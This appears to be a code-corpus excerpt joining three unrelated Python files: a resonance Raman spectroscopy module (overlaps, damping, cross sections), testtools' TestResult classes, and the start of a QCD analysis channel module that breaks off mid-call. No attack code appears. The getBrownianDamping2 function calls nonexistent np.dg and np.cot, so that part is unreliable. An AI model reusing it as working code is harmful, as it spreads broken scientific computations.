coordinate. :param array t: Time axis in (fs). :param float beta: Slope of excited state potential energy surface (dV / dq) in (cm-1) (q is dimensionless coordinate). :param float eVIB: Vibrational frequency (cm-1). :returns: 1-0 overlap integral as function of time (same shape as t). .. seealso:: Myers, Eqs. (52) - (54). """ return -1j * 2**(-0.5) * (beta * t / hbar) # * t00D(t, beta, eVIB) def t20D(t, beta, eVIB): """Time dependent overlap integral between vibrational ground and second excited state of electronic ground and excited state with a linear dissociative excited state surface along this vibrational coordinate. :param array t: Time axis in (fs). :param float beta: Slope of excited state potential energy surface (dV / dq) in (cm-1) (q is dimensionless coordinate). :param float eVIB: Vibrational frequency (cm-1). :returns: 2-0 overlap integral as function of time (same shape as t). .. seealso:: Myers, Eqs. (52) - (54). """ return -2**(-0.5) * (beta**2 * t**2 / (2.0 * hbar**2) - 1j * eVIB / hbar * t / (2.0 + 1j * eVIB / hbar * t)) # * t00D(t, beta, eVIB) # --------------------------------------------------------------------------------------------------------------------------------- def getOverlaps(t, D, RMg, RMe, nquanta): """Calculate the time dependent overlap integrals / Franck-Condon factors :math:`<i|i(t)>_k` and :math:`<f|i(t)>_k`. .. versionchanged:: 10-07-2015 Format of return value changed. :param array t: Time axis in (fs). :param array D: Array of N normalized displacements of excited state surfaces (deltas), or slope of linear dissociative excited state surface. :param array RMg: N Raman ground state frequencies (cm-1). :param array RMe: N Raman excited state frequencies (cm-1) or -1 if excited state surface is dissociative. :param array nquanta: M x N array containing the quanta of the N possible Raman modes for the M Raman lines to calculate. Use :py:func:`numpy.identity` to just calculate the fundamentals. Possible values are 0 (no excitation), 1 (fundamental), 2 (first overtone). :returns: M + 2 - dimensional array containing the Rayleigh, fluorescence and M Raman overlaps. """ ovlps = [] N = len(D) M = nquanta.shape[0] # Frank-Condon factors <i|i(t)>_k and <f|i(t)>_k FC0 = [] FC0p = [] FC1 = [] FC2 = [] for i in range(N): if(RMg[i] == RMe[i]): FC0.append(t00A(t, D[i], RMg[i])) FC0p.append(FC0[-1]) # fluorescence overlap is identical to absorption overlap when frequencies are equal FC1.append(t10A(t, D[i], RMg[i])) FC2.append(t20A(t, D[i], RMg[i])) elif(RMe[i] == -1): FC0.append(t00D(t, D[i], RMg[i])) FC0p.append(np.zeros(len(t))) # fluorescence is negligible from dissociative surface FC1.append(t10D(t, D[i], RMg[i])) FC2.append(t20D(t, D[i], RMg[i])) else: FC0.append(t00B(t, D[i], RMg[i], RMe[i])) FC0p.append(t00B(t, D[i], RMe[i], RMg[i])) # fluorescence overlap has excited state and ground state Raman frequencies switched FC1.append(t10B(t, D[i], RMg[i], RMe[i])) FC2.append(t20B(t, D[i], RMg[i], RMe[i])) # go to numpy array.. FC0 = np.array(FC0) FC0p = np.array(FC0p) FC1 = np.array(FC1) FC2 = np.array(FC2) # Rayleigh / absorption overlap oabs = 1.0 + 0.0 * 1j # reuse this term for the raman overlaps for i in range(N): oabs = oabs * FC0[i] ovlps.append(oabs) # fluorescence overlap o = 1.0 + 0.0 * 1j for i in range(N): o = o * FC0p[i] ovlps.append(o) # actual Raman overlaps for j in range(M): o = 1.0 * oabs # all raman modes are based on this product and additional terms given by the excited modes for i in range(N): if(nquanta[j][i] == 1): o = o * FC1[i] elif(nquanta[j][i] == 2): o = o * FC2[i] ovlps.append(o) return ovlps # --------------------------------------------------------------------------------------------------------------------------------- def getZeroZeroEnergy(t, E0): """Calculate the oscillation term in the time domain due to the electronic zero-zero energy E0. :param array t: Time axis (fs). :param float E0: Difference between excited and ground state vibrational ground state energies, *zero-zero energy* (cm-1). """ return np.exp(-1j * E0 / hbar * t) # ----------------------------------------------------------------------------------------------------------------------------- # Calculate the damping terms as function of time t. def getHomogeneousDamping(t, Gamma, alpha=0, lmbda=0): """Calculates the damping term arising from the homogeneous linewidth of the electronic transition. Offers phenomenological support for Stokes shift. .. note:: Added phenomenological Stokes shift to input parameters on 10-12-2015. See for example *New J Phys* **11**, 015001 (2009), Eqs. (1) and (2). :param array t: Time axis (fs). :param float Gamma: Decay rate according to :math:`1 / \\tau` in (cm-1), where :math:`tau` is exponential dephasing time. :param float alpha: Line shape parameter: - 1 = Gaussian - 0 = Lorentzian :param float lmbda: Phenomenological Stokes shift (cm-1) which is added as imaginary part to g(t). Compared to the Brownian oscillator models, lmbda **is** the observed Stokes shift. (default = 0) :returns: Damping term in the time domain, :math:`e^{-g(t) - i \lambda t / 2 \hbar}`. """ g = alpha * (Gamma**2 / hbar**2 * t**2) + (1 - alpha) * (Gamma / hbar * t) + 1j * lmbda / 2.0 * t / hbar return np.exp(-g) def getKuboDamping(t, Delta, Lambda): """Calculates the damping term using Kubo's *stochastic model*. This model describes the broadening, but does not yield solvent induced Stokes shifts. :param array t: Time axis (fs). :param float Delta: Magnitude of solvent energy gap fluctuations (cm-1). This parameter also controls the effective line shape: - Delta >> Lambda = Lorentzian - Delta << Lambda = Gaussian :param float Lambda: Effective frequency of solvent fluctuations (cm-1). :returns: Damping term in the time domain, :math:`e^{-g(t)}`. .. seealso:: Myers, *J. Raman. Spectrosc.* **28**, 389 (1997) """ return np.exp(-(Delta / Lambda)**2 * (np.exp(-Lambda / hbar * t) + Lambda / hbar * t - 1.0)) def getBrownianDamping(t, kappa, T, egamma, cutoff=1e-6): """Calculate the damping term using Mukamel's Brownian oscillator model based on Myers Fortran code. The real part of g(t) leads to a Gaussian broadening of the spectra, while the imaginary part leads to a solvent induced Stokes shift. :param array t: Time axis (fs). :param float kappa: Lineshape parameter: - kappa >> 1 = Lorentzian, - kappa << 1 = Gaussian. :param float T: Temperature in K. :param float egamma: Electronic homogeneous linewidth (**FWHM**, cm-1). :param float cutoff: Cutoff for sum over Brownian oscillators. Typically between 1e-6 (default) and 1e-8. Check for convergence by re-running with different values. :returns: Damping term in the time domain, :math:`e^{-g(t)}`. .. seealso:: Myers, *J. Raman. Spectrosc.* **28**, 389 (1997) """ temp = np.absolute(T) # ---------------------------------------------------------- # 1: derive Mukamel's parameters from kappa, temp and egamma # I do not have a reference for this part - it's taken from Myers fortran code # Boltzmann beta beta = 1.0 / (kB * temp) # 1/cm-1 # some 'a' parameter (this comes from Myers Fortran program) a = (2.355 + 1.76 * kappa) / (1.0 + 0.85 * kappa + 0.88 * kappa**2) # these are Mukamel's parameters in Myers, J. Raman. Spec. 28, 389 (1997), eqs. (35) to (38) Lambda = kappa * egamma / a # cm-1 lmbda = beta * (Lambda / kappa)**2 / 2.0 # cm-1 # ---------------------------------------------------------- # 2: calculate the sum over n Brownian oscillators vs = np.zeros(len(t)) # this is the sum over the n oscillators as function of time in (cm-1)**-3 n = 0 while(True): n = n + 1 vn = 2.0 * np.pi * n / beta # cm-1 vinc = (np.exp(-vn / hbar * t) + vn / hbar * t - 1) / (vn * (vn**2 - Lambda**2)) vs = vs + vinc if(np.amax(np.absolute(vinc[1:] / vs[1:])) < cutoff): # the first element of vs is always 0 break # ---------------------------------------------------------- # 3: calculate the damping function g(t) gexp = np.exp(-Lambda / hbar * t) + Lambda / hbar * t - 1.0 # dimensionless greal = (lmbda / Lambda) / np.tan(beta * Lambda / 2.0) * gexp # dimensionless greal = greal + 4.0 * lmbda * Lambda / beta * vs # dimensionless gimag = -(lmbda / Lambda) * gexp # dimensionless g = greal + 1j * gimag # dimensionless return np.exp(-g) def getBrownianDamping2(t, lmbda, Lambda, T=298.0, cutoff=1e-6): """Calculate pure electronic dephasing due to interaction with solvent using frictionally overdamped Brownian oscillator model. The real part of g(t) leads to a Gaussian broadening of the spectra, while the imaginary part leads to a solvent induced Stokes shift. :param array t: Time axis in fs. :param float lmbda: Solvent contribution to reorganization energy (cm-1). :param float Lambda: Inverse of characteristic time scale for solvent fluctuations (fs-1). :param float T: Temperature (K, default = 298 K). :param float cutoff: Cutoff value for summation over brownian oscillators (default 1e-6). :returns: Damping term in the time domain, :math:`e^{-g(t)}`. .. seealso:: This implementation is taken from Kulinowksi, *J Phys Chem* **99**, 9017 (1995), Eqs. (10a) to (10d). """ beta = 1.0 / (kB * np.absolute(T)) lmb = lmbda / hbar # convert to fs-1 # calculate real part as sum over oscillators gR = 0.0 i = 1.0 while(1): nun = 2.0 * np.pi / (hbar * beta) * i # frequency of ith oscillator dg = (np.exp(-nun * t) + nun * t - 1.0) / (nun * (nun**2 - Lambda**2)) gR = gR + dg i = i + 1.0 if np.sum(np.absolute(np.dg)) / np.sum(np.absolute(gR)) < cutoff: break gR = gR * 4.0 * lmb * Lambda / (hbar * beta) gR = gR + (lmb / Lambda) * np.cot(hbar * beta * Lambda / 2.0) * (np.exp(-Lambda * t) + Lambda * t - 1.0) # calculate imaginary part = Stokes shift gI = -(lmb / Lambda) * (np.exp(-Lambda * t) - 1.0) # assemble g = gR + 1j * gI # dimensionless return np.exp(-g) def getBrownianDampingSlowMod(t, lmbda, T=298.0): """Calculate pure electronic dephasing due to interaction with solvent using frictionally overdamped Brownian oscillator model in the high-temperature and slow-modulation limit. The real part of g(t) leads to a Gaussian broadening of the spectra, while the imaginary part leads to a solvent induced Stokes shift. :param array t: Time axis in fs. :param float lmbda: Solvent contribution to reorganization energy (cm-1). :param float T: Temperature (K, default = 298 K). :returns: Damping term in the time domain, :math:`e^{-g(t)}`. .. seealso:: This implementation is taken from Kulinowksi, *J Phys Chem* **99**, 9017 (1995), Eq. (11). """ lmb = lmbda / hbar # convert to fs-1 return np.exp(-(lmb * kB * np.absolute(T) * t**2 / hbar + 1j * lmb * t)) # --------------------------------------------------------------------------------------------------------------------------------- # def applyInhomogeneousBroadening(wn, y, sig, alpha=1): """Convolute a spectrum with a Gaussian/Lorentzian to account for inhomogeneous broadening. :param array wn: Frequency axis in same units as sig (cm-1). :param array y: Input spectrum, same shape as wn. :param float sig: Width of convolution function in same units as x (standard deviation of Gaussian distribution). Must not be zero. :param float alpha: Lineshape parameter: - 1 = Gaussian, - 0 = Lorentzian. :returns: Convoluted spectrum (same shape as y). """ ck = alpha / (sig * np.sqrt(2 * np.pi)) * np.exp(-(wn - (wn[-1] + wn[0]) / 2.0)**2 / (2.0 * sig**2)) ck += (1 - alpha) * sig / (np.pi * ((wn - (wn[-1] + wn[0]) / 2)**2 + sig**2)) # np.convolve uses a sum, whereas the function we want uses an integral; wn[1] - wn[0] is dwn return (wn[1] - wn[0]) * np.convolve(y, ck, 'same') # -------------------------------------------------------------------------------------------------------------------------------- def prefA(eEL, M, IOR, dt): """Return the prefactor for the absorption cross section calculation in (A**2 / molec). :param array eEL: Laser excitation energy in (cm-1). May also be a single float value. :param float M: Electronic transition dipole length in (A). :param float IOR: Index of refraction of surrounding solvent / medium. :param float dt: Time increment used for integration (fs). :returns: Prefactor for absorption cross section calculation. .. seealso:: Myers, Eq. (35). """ # to convert from esu to SI divide by 4 pi eps0 # the factor / 2 arises from the normalization of numpy of the rfft to match the amplitude of fft # so rfft is not completely identical to half-sided FT integral return 5.7579e-6 * M**2 * eEL * dt / IOR / 2.0 # ------------------------------------------------------------------------------------------------------------------------------- def prefR(eEL, M, eR, dt): """Return the prefactor for the Raman excitation profile calculation (A**2 / molec). :param array eEL: Laser excitation energies in (cm-1). Can also be a single floating point value. :param float M: Electronic transition dipole moment in (A). :param float eR: Stokes shift of the Raman line in (cm-1). :param float dt: Time increment for the integration (fs). :returns: The prefactor for the Raman excitation profile calculation. .. seealso:: Myers, Eq. (34) and following text. """ # get energy of stokes shifted photons eES = eEL - eR # the 1e-6 is for fs instead of ps in the integral and is consistent with Myers fortran code (it is different however from the 1e4 factor in Valley & Hoffman code!!) # to convert from esu to SI divide by (4 pi eps0)**2 return 2.0831e-20 * 1e-6 * M**4 * eES**3 * eEL * dt**2 # -------------------------------------------------------------------------------------------------------------------------------- def prefF(eEF, M, IOR, dt): """Return the prefactor for the fluorescence efficiency calculation (unitless). See :py:func:`getCrossSections` for more details. :param array eEF: Fluorescence energy in (cm-1). May also be a single float value. :param float M: Electronic transition dipole length in (A). :param float IOR: Index of refraction of surrounding solvent / medium. :param float dt: Time increment used for integration (fs). :returns: Prefactor for fluorescence efficiency calculation. .. seealso:: Myers, *Chem. Phys.* **180**, 215 (1994), Eqs. (6) and (26). """ # to convert from esu to SI divide by 4 pi eps0 # the factor / 2 arises from the normalization of numpy of the rfft to match the amplitude of fft # so rfft is not completely identical to half-sided FT integral return 3.6656e-22 * IOR * M**2 * eEF**3 * dt / 2.0 # ---------------------------------------------------------------------------------------------------------------------------- def getCrossSections(t, wn, E0, ovlps, sshift, M, IOR, damp=1, sig=0, ialpha=1): """Calculate the absorption and Raman cross-sections and the fluorescence efficiency. The latter is a unitless quantity which may be used to calculate the fluorescence rate (=rate of spontaneous emission) by integrating over the frequency axis (see Myers, *Chem. Phys.* **180**, 215 (1994) Eq. 6 and discussion). .. note:: Changed shape of input parameters and shape of return values on 10-07-2015. :param array t: Time axis in (fs). This axis is used for the calculation of the zero-zero energy term in the time domain. :param array wn: Wavenumber axis in (cm-1). Same shape as t. :param array E0: Zero-zero energy. This function then calculates the time domain part using `getZeroZeroEnergy`. :param array ovlps: M + 2 Absorption, fluorescence and Raman overlap integrals. :param float sshift: Vibrational freqencies of M Raman modes to calculate (cm-1). :param float M: Electronic transition dipole length (A). :param float IOR: Index of refraction of surrounding medium / solvent. :param array damp: Damping function in the time domain. Same shape as t. Set to 1 if no damping is used (default). :param float sig: Linewidth for inhomogeneous damping (standard deviation of Gaussian), set to zero if not used (default). :param float ialpha: Lineshape parameter for inhomogeneous damping: - 1 = Gaussian (default), - 0 = Lorentzian. :returns: Absorption (sigmaA), M Raman cross sections (sigmaR[M]), both in A**2 / mol., and fluorescence efficiency spectrum, kF (arrays have same shape as wn); all as function of excitation wavenumber. """ Npoints = len(wn) dt = t[1] - t[0] # caluclate zero-zero time domain part tdpart = getZeroZeroEnergy(t, E0) # absorption cross section - using the half sided FT (equivalent to rfft) tmp = np.real(Npoints * np.fft.irfft(ovlps[0] * tdpart * damp, Npoints)) if(sig > 0): tmp = applyInhomogeneousBroadening(wn, tmp, sig, ialpha) sigmaA = prefA(wn, M, IOR, dt) * tmp # fluorescence rate / intensity - using half sided FT - similar to absorption # in order to account for the sign change, the zero-zero energy time domain part and the damping term had to be separated; # use the tdpart conjugated and change irfft by hfft to get the factor exp(-1j w t) # numpy does not normalize the forward FFT, so no factor Npoints tmp = np.real(np.fft.hfft(ovlps[1] * np.conjugate(tdpart) * damp, Npoints)) if(sig > 0): tmp = applyInhomogeneousBroadening(wn, tmp, sig, ialpha) kF = prefF(wn, M, IOR, dt) * tmp # Raman cross sections - using a standard FT sigmaR = [] for i, ovlp in enumerate(ovlps[2:]): # iterate over all lines tmp = np.absolute(Npoints * np.fft.ifft(ovlp * tdpart * damp, Npoints))**2 # use again the inverse transform to get "exp(1j w t)" if(sig > 0): tmp = applyInhomogeneousBroadening(wn, tmp, sig, ialpha) sigmaR.append(prefR(wn, M, sshift[i], dt) * tmp) return sigmaA, sigmaR, kF
lauria/Samba4
lib/testtools/testtools/testresult/real.py
# Copyright (c) 2008 testtools developers. See LICENSE for details. """Test results and related things.""" __metaclass__ = type __all__ = [ 'ExtendedToOriginalDecorator', 'MultiTestResult', 'TestResult', 'ThreadsafeForwardingResult', ] import datetime import sys import unittest from testtools.compat import all, _format_exc_info, str_is_unicode, _u # From http://docs.python.org/library/datetime.html _ZERO = datetime.timedelta(0) # A UTC class. class UTC(datetime.tzinfo): """UTC""" def utcoffset(self, dt): return _ZERO def tzname(self, dt): return "UTC" def dst(self, dt): return _ZERO utc = UTC() class TestResult(unittest.TestResult): """Subclass of unittest.TestResult extending the protocol for flexability. This test result supports an experimental protocol for providing additional data to in test outcomes. All the outcome methods take an optional dict 'details'. If supplied any other detail parameters like 'err' or 'reason' should not be provided. The details dict is a mapping from names to MIME content objects (see testtools.content). This permits attaching tracebacks, log files, or even large objects like databases that were part of the test fixture. Until this API is accepted into upstream Python it is considered experimental: it may be replaced at any point by a newer version more in line with upstream Python. Compatibility would be aimed for in this case, but may not be possible. :ivar skip_reasons: A dict of skip-reasons -> list of tests. See addSkip. """ def __init__(self): # startTestRun resets all attributes, and older clients don't know to # call startTestRun, so it is called once here. # Because subclasses may reasonably not expect this, we call the # specific version we want to run. TestResult.startTestRun(self) def addExpectedFailure(self, test, err=None, details=None): """Called when a test has failed in an expected manner. Like with addSuccess and addError, testStopped should still be called. :param test: The test that has been skipped. :param err: The exc_info of the error that was raised. :return: None """ # This is the python 2.7 implementation self.expectedFailures.append( (test, self._err_details_to_string(test, err, details))) def addError(self, test, err=None, details=None): """Called when an error has occurred. 'err' is a tuple of values as returned by sys.exc_info(). :param details: Alternative way to supply details about the outcome. see the class docstring for more information. """ self.errors.append((test, self._err_details_to_string(test, err, details))) def addFailure(self, test, err=None, details=None): """Called when an error has occurred. 'err' is a tuple of values as returned by sys.exc_info(). :param details: Alternative way to supply details about the outcome. see the class docstring for more information. """ self.failures.append((test, self._err_details_to_string(test, err, details))) def addSkip(self, test, reason=None, details=None): """Called when a test has been skipped rather than running. Like with addSuccess and addError, testStopped should still be called. This must be called by the TestCase. 'addError' and 'addFailure' will not call addSkip, since they have no assumptions about the kind of errors that a test can raise. :param test: The test that has been skipped. :param reason: The reason for the test being skipped. For instance, u"pyGL is not available". :param details: Alternative way to supply details about the outcome. see the class docstring for more information. :return: None """ if reason is None: reason = details.get('reason') if reason is None: reason = 'No reason given' else: reason = ''.join(reason.iter_text()) skip_list = self.skip_reasons.setdefault(reason, []) skip_list.append(test) def addSuccess(self, test, details=None): """Called when a test succeeded.""" def addUnexpectedSuccess(self, test, details=None): """Called when a test was expected to fail, but succeed.""" self.unexpectedSuccesses.append(test) def wasSuccessful(self): """Has this result been successful so far? If there have been any errors, failures or unexpected successes, return False. Otherwise, return True. Note: This differs from standard unittest in that we consider unexpected successes to be equivalent to failures, rather than successes. """ return not (self.errors or self.failures or self.unexpectedSuccesses) if str_is_unicode: # Python 3 and IronPython strings are unicode, use parent class method _exc_info_to_unicode = unittest.TestResult._exc_info_to_string else: # For Python 2, need to decode components of traceback according to # their source, so can't use traceback.format_exception # Here follows a little deep magic to copy the existing method and # replace the formatter with one that returns unicode instead from types import FunctionType as __F, ModuleType as __M __f = unittest.TestResult._exc_info_to_string.im_func __g = dict(__f.func_globals) __m = __M("__fake_traceback") __m.format_exception = _format_exc_info __g["traceback"] = __m _exc_info_to_unicode = __F(__f.func_code, __g, "_exc_info_to_unicode") del __F, __M, __f, __g, __m def _err_details_to_string(self, test, err=None, details=None): """Convert an error in exc_info form or a contents dict to a string.""" if err is not None: return self._exc_info_to_unicode(err, test) return _details_to_str(details, special='traceback') def _now(self): """Return the current 'test time'. If the time() method has not been called, this is equivalent to datetime.now(), otherwise its the last supplied datestamp given to the time() method. """ if self.__now is None: return datetime.datetime.now(utc) else: return self.__now def startTestRun(self): """Called before a test run starts. New in Python 2.7. The testtools version resets the result to a pristine condition ready for use in another test run. Note that this is different from Python 2.7's startTestRun, which does nothing. """ super(TestResult, self).__init__() self.skip_reasons = {} self.__now = None # -- Start: As per python 2.7 -- self.expectedFailures = [] self.unexpectedSuccesses = [] # -- End: As per python 2.7 -- def stopTestRun(self): """Called after a test run completes New in python 2.7 """ def time(self, a_datetime): """Provide a timestamp to represent the current time. This is useful when test activity is time delayed, or happening concurrently and getting the system time between API calls will not accurately represent the duration of tests (or the whole run). Calling time() sets the datetime used by the TestResult object. Time is permitted to go backwards when using this call. :param a_datetime: A datetime.datetime object with TZ information or None to reset the TestResult to gathering time from the system. """ self.__now = a_datetime def done(self): """Called when the test runner is done. deprecated in favour of stopTestRun. """ class MultiTestResult(TestResult): """A test result that dispatches to many test results.""" def __init__(self, *results): TestResult.__init__(self) self._results = list(map(ExtendedToOriginalDecorator, results)) def __repr__(self): return '<%s (%s)>' % ( self.__class__.__name__, ', '.join(map(repr, self._results))) def _dispatch(self, message, *args, **kwargs): return tuple( getattr(result, message)(*args, **kwargs) for result in self._results) def startTest(self, test): return self._dispatch('startTest', test) def stopTest(self, test): return self._dispatch('stopTest', test) def addError(self, test, error=None, details=None): return self._dispatch('addError', test, error, details=details) def addExpectedFailure(self, test, err=None, details=None): return self._dispatch( 'addExpectedFailure', test, err, details=details) def addFailure(self, test, err=None, details=None): return self._dispatch('addFailure', test, err, details=details) def addSkip(self, test, reason=None, details=None): return self._dispatch('addSkip', test, reason, details=details) def addSuccess(self, test, details=None): return self._dispatch('addSuccess', test, details=details) def addUnexpectedSuccess(self, test, details=None): return self._dispatch('addUnexpectedSuccess', test, details=details) def startTestRun(self): return self._dispatch('startTestRun') def stopTestRun(self): return self._dispatch('stopTestRun') def time(self, a_datetime): return self._dispatch('time', a_datetime) def done(self): return self._dispatch('done') def wasSuccessful(self): """Was this result successful? Only returns True if every constituent result was successful. """ return all(self._dispatch('wasSuccessful')) class TextTestResult(TestResult): """A TestResult which outputs activity to a text stream.""" def __init__(self, stream): """Construct a TextTestResult writing to stream.""" super(TextTestResult, self).__init__() self.stream = stream self.sep1 = '=' * 70 + '\n' self.sep2 = '-' * 70 + '\n' def _delta_to_float(self, a_timedelta): return (a_timedelta.days * 86400.0 + a_timedelta.seconds + a_timedelta.microseconds / 1000000.0) def _show_list(self, label, error_list): for test, output in error_list: self.stream.write(self.sep1) self.stream.write("%s: %s\n" % (label, test.id())) self.stream.write(self.sep2) self.stream.write(output) def startTestRun(self): super(TextTestResult, self).startTestRun() self.__start = self._now() self.stream.write("Tests running...\n") def stopTestRun(self): if self.testsRun != 1: plural = 's' else: plural = '' stop = self._now() self._show_list('ERROR', self.errors) self._show_list('FAIL', self.failures) for test in self.unexpectedSuccesses: self.stream.write( "%sUNEXPECTED SUCCESS: %s\n%s" % ( self.sep1, test.id(), self.sep2)) self.stream.write("\nRan %d test%s in %.3fs\n" % (self.testsRun, plural, self._delta_to_float(stop - self.__start))) if self.wasSuccessful(): self.stream.write("OK\n") else: self.stream.write("FAILED (") details = [] details.append("failures=%d" % ( sum(map(len, ( self.failures, self.errors, self.unexpectedSuccesses))))) self.stream.write(", ".join(details)) self.stream.write(")\n") super(TextTestResult, self).stopTestRun() class ThreadsafeForwardingResult(TestResult): """A TestResult which ensures the target does not receive mixed up calls. This is used when receiving test results from multiple sources, and batches up all the activity for a single test into a thread-safe batch where all other ThreadsafeForwardingResult objects sharing the same semaphore will be locked out. Typical use of ThreadsafeForwardingResult involves creating one ThreadsafeForwardingResult per thread in a ConcurrentTestSuite. These forward to the TestResult that the ConcurrentTestSuite run method was called with. target.done() is called once for each ThreadsafeForwardingResult that forwards to the same target. If the target's done() takes special action, care should be taken to accommodate this. """ def __init__(self, target, semaphore): """Create a ThreadsafeForwardingResult forwarding to target. :param target: A TestResult. :param semaphore: A threading.Semaphore with limit 1. """ TestResult.__init__(self) self.result = ExtendedToOriginalDecorator(target) self.semaphore = semaphore def __repr__(self): return '<%s %r>' % (self.__class__.__name__, self.result) def _add_result_with_semaphore(self, method, test, *args, **kwargs): self.semaphore.acquire() try: self.result.time(self._test_start) self.result.startTest(test) self.result.time(self._now()) try: method(test, *args, **kwargs) finally: self.result.stopTest(test) finally: self.semaphore.release() def addError(self, test, err=None, details=None): self._add_result_with_semaphore(self.result.addError, test, err, details=details) def addExpectedFailure(self, test, err=None, details=None): self._add_result_with_semaphore(self.result.addExpectedFailure, test, err, details=details) def addFailure(self, test, err=None, details=None): self._add_result_with_semaphore(self.result.addFailure, test, err, details=details) def addSkip(self, test, reason=None, details=None): self._add_result_with_semaphore(self.result.addSkip, test, reason, details=details) def addSuccess(self, test, details=None): self._add_result_with_semaphore(self.result.addSuccess, test, details=details) def addUnexpectedSuccess(self, test, details=None): self._add_result_with_semaphore(self.result.addUnexpectedSuccess, test, details=details) def startTestRun(self): self.semaphore.acquire() try: self.result.startTestRun() finally: self.semaphore.release() def stopTestRun(self): self.semaphore.acquire() try: self.result.stopTestRun() finally: self.semaphore.release() def done(self): self.semaphore.acquire() try: self.result.done() finally: self.semaphore.release() def startTest(self, test): self._test_start = self._now() super(ThreadsafeForwardingResult, self).startTest(test) def wasSuccessful(self): return self.result.wasSuccessful() class ExtendedToOriginalDecorator(object): """Permit new TestResult API code to degrade gracefully with old results. This decorates an existing TestResult and converts missing outcomes such as addSkip to older outcomes such as addSuccess. It also supports the extended details protocol. In all cases the most recent protocol is attempted first, and fallbacks only occur when the decorated result does not support the newer style of calling. """ def __init__(self, decorated): self.decorated = decorated def __repr__(self): return '<%s %r>' % (self.__class__.__name__, self.decorated) def __getattr__(self, name): return getattr(self.decorated, name) def addError(self, test, err=None, details=None): self._check_args(err, details) if details is not None: try: return self.decorated.addError(test, details=details) except TypeError: # have to convert err = self._details_to_exc_info(details) return self.decorated.addError(test, err) def addExpectedFailure(self, test, err=None, details=None): self._check_args(err, details) addExpectedFailure = getattr( self.decorated, 'addExpectedFailure', None) if addExpectedFailure is None: return self.addSuccess(test) if details is not None: try: return addExpectedFailure(test, details=details) except TypeError: # have to convert err = self._details_to_exc_info(details) return addExpectedFailure(test, err) def addFailure(self, test, err=None, details=None): self._check_args(err, details) if details is not None: try: return self.decorated.addFailure(test, details=details) except TypeError: # have to convert err = self._details_to_exc_info(details) return self.decorated.addFailure(test, err) def addSkip(self, test, reason=None, details=None): self._check_args(reason, details) addSkip = getattr(self.decorated, 'addSkip', None) if addSkip is None: return self.decorated.addSuccess(test) if details is not None: try: return addSkip(test, details=details) except TypeError: # extract the reason if it's available try: reason = ''.join(details['reason'].iter_text()) except KeyError: reason = _details_to_str(details) return addSkip(test, reason) def addUnexpectedSuccess(self, test, details=None): outcome = getattr(self.decorated, 'addUnexpectedSuccess', None) if outcome is None: try: test.fail("") except test.failureException: return self.addFailure(test, sys.exc_info()) if details is not None: try: return outcome(test, details=details) except TypeError: pass return outcome(test) def addSuccess(self, test, details=None): if details is not None: try: return self.decorated.addSuccess(test, details=details) except TypeError: pass return self.decorated.addSuccess(test) def _check_args(self, err, details): param_count = 0 if err is not None: param_count += 1 if details is not None: param_count += 1 if param_count != 1: raise ValueError("Must pass only one of err '%s' and details '%s" % (err, details)) def _details_to_exc_info(self, details): """Convert a details dict to an exc_info tuple.""" return ( _StringException, _StringException(_details_to_str(details, special='traceback')), None) def done(self): try: return self.decorated.done() except AttributeError: return def progress(self, offset, whence): method = getattr(self.decorated, 'progress', None) if method is None: return return method(offset, whence) @property def shouldStop(self): return self.decorated.shouldStop def startTest(self, test): return self.decorated.startTest(test) def startTestRun(self): try: return self.decorated.startTestRun() except AttributeError: return def stop(self): return self.decorated.stop() def stopTest(self, test): return self.decorated.stopTest(test) def stopTestRun(self): try: return self.decorated.stopTestRun() except AttributeError: return def tags(self, new_tags, gone_tags): method = getattr(self.decorated, 'tags', None) if method is None: return return method(new_tags, gone_tags) def time(self, a_datetime): method = getattr(self.decorated, 'time', None) if method is None: return return method(a_datetime) def wasSuccessful(self): return self.decorated.wasSuccessful() class _StringException(Exception): """An exception made from an arbitrary string.""" if not str_is_unicode: def __init__(self, string): if type(string) is not unicode: raise TypeError("_StringException expects unicode, got %r" % (string,)) Exception.__init__(self, string) def __str__(self): return self.args[0].encode("utf-8") def __unicode__(self): return self.args[0] # For 3.0 and above the default __str__ is fine, so we don't define one. def __hash__(self): return id(self) def __eq__(self, other): try: return self.args == other.args except AttributeError: return False def _format_text_attachment(name, text): if '\n' in text: return "%s: {{{\n%s\n}}}\n" % (name, text) return "%s: {{{%s}}}" % (name, text) def _details_to_str(details, special=None): """Convert a details dict to a string. :param details: A dictionary mapping short names to ``Content`` objects. :param special: If specified, an attachment that should have special attention drawn to it. The primary attachment. Normally it's the traceback that caused the test to fail. :return: A formatted string that can be included in text test results. """ empty_attachments = [] binary_attachments = [] text_attachments = [] special_content = None # sorted is for testing, may want to remove that and use a dict # subclass with defined order for items instead. for key, content in sorted(details.items()): if content.content_type.type != 'text': binary_attachments.append((key, content.content_type)) continue text = _u('').join(content.iter_text()).strip() if not text: empty_attachments.append(key) continue # We want the 'special' attachment to be at the bottom. if key == special: special_content = '%s\n' % (text,) continue text_attachments.append(_format_text_attachment(key, text)) if text_attachments and not text_attachments[-1].endswith('\n'): text_attachments.append('') if special_content: text_attachments.append(special_content) lines = [] if binary_attachments: lines.append('Binary content:\n') for name, content_type in binary_attachments: lines.append(' %s (%s)\n' % (name, content_type)) if empty_attachments: lines.append('Empty attachments:\n') for name in empty_attachments: lines.append(' %s\n' % (name,)) if (binary_attachments or empty_attachments) and text_attachments: lines.append('\n') lines.append('\n'.join(text_attachments)) return _u('').join(lines)
andrewhanlon/QCD_scripts
sigmond/channel.py
import abc import subprocess import logging from observables import BLOperator, MCObservable from data import BLDataChannel, GIDataChannel import util class Channel(metaclass=abc.ABCMeta): ISOSPIN_MAP = { 'singlet': "0", 'doublet': "1h", 'triplet': "1", 'quartet': "3h", 'quintet': "2", 'sextet': "5h" } def __init__(self, *, particle_type=None, isospin, strangeness=None, laph_query="laph_query", sigmond_query="sigmond_query"): self.particle_type = particle_type self.strangeness = strangeness self.isospin = isospin self.laph_query = laph_query self.sigmond_query = sigmond_query # @ADH - I think I am going to have the DataHandler deal with these in the future self.raw_data_channels = list() @staticmethod def initialize(*, data_file, laph_query="laph_query", sigmond_query="sigmond_query", is_basic_laph=True): if is_basic_laph: query_result = subprocess.check_output([laph_query, '-i', data_file]).decode() laph_xml = util.queryToXML(query_result) operator = BLOperator.createFromXML(laph_xml.find(".//Operator")) if 'special' in data_file.split('/'): return SpecialChannel(particle_type=operator.particle_type, isospin=operator.isospin, strangeness=operator.strangeness, flavor=operator.flavor, laph_query=laph_query, sigmond_query=sigmond_query) elif operator.psq > 0: return MovingChannel(particle_type=operator.particle_type, isospin=operator.isospin, strangeness=operator.strangeness, psq=operator.psq, lg_irrep=operator.lg_irrep, laph_query=laph_query, 